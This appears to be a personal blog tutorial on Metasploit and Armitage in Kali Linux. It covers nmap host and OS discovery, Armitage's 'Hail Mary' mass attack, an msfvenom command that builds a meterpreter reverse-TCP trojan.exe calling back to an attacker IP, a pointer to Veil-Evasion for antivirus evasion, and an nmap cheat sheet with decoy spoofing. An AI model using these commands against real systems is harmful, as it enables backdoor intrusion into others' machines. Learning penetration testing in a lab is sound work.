Metasploit & Armitage

Armitage is a GUI based Metasploit, it save your time to remember all cli commands in metasploit and visualize scanning results.  Both of the tools are available in kalilinux. If you can use one of them, then you can use the other automaticly.

I tried both, below is the guide to discover all online machine in a subnet by using armigate:

1,  Hosts tab-> clear database

This is to prepare a clean environment for new discovery

2,  Hosts->nmap scan -> quick scan (detect OS) -> input subnet IP for scaning

This will take a couple of minutes to complete depending on how big the subnet is. This step can be finished by using pure nmap command under cli.

After this step, you should be able to see the operation system running on each machine, however it can not recognize windows 10.  By using nmap we would check the way of detecting OS. In short nmap will scan some special ports of the victim and see if those ports are open, especially 139 and 445. If these ports are open, nmap can very likly use them to detecting OS of the victim, more details here.

“One of Nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to itsnmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6.”

When trying to scan window 10 machine, we can see the message something like ” all ports are filtered”. Below is an example of scanning windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds

3, When scanning is completed, all online machine will be listed as icons in the workspace.  we can do attacks -> find attacks to find all possible attacks towards each machines. we can also do attacks -> Hail Mary  to launch massive attacks towards target machines.

Unfortunately I tried Hail Mary towards my windows 7 and window 8.1, no one get compromised. Again it looks like all those attacks in metasploit are already well-known, and can not be a serious threat in the real world.

In order to implement a successful attack, we can also utilize payload in metasploit. I tested that classic payload windows/meterpreter/reverse_tcp

Here is the guide regarding how to generate a vicious .exe code, in short:

# msfvenom -p windows/meterpreter/reverse_tcp  –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=4444 -o /root/Desktop/trojan.exe

Msfvenom is a tool used to generated vicious code for metasploit payload. The code need to be transfered to target machines and runned there in order to create a backdoor towards attackers machine.

The real challenge is actually to send this .exe code to victim machine. I am using my own machine for test but can not even load the code into my machine. I tried by sending myself email, but the email attachment is blocked because google has detected malicious malware in the attachment. I tried to copy the file into USB, but as long as I insert USB into my test machine the malware is removed by windows defender. The author recommended to use some encoder, for example Veil-Evasion to disguise .exe file, need find time to try this.






nmap -sn 192.178.1.*
tcp syn 1-1000 port number
tcp syn, protocol number, operation version, operation system
nmap -sS -p0 -sV -o
quick scanning
nmap -T5
tcp connect scan for only port 80
nmap -sT -p80
to use faked source ip address and reall src ip together
nmap -sS -D (faked src add)
scan only the first 100 ports instead of 1000 ports
nmap -F -exclude
do ping first, if get response, then go to scap 1000 port
nmap -Pn
scap ipv6 address
nmap -6 ipv6 address
nmap -iflist
to scan the 20 most popular ports
nmap –top-ports 20
run nmap with script
nmap –script=default
nmap -script -help to find all script that can be used
enable all advanced/aggressive scan
nmap -A -T5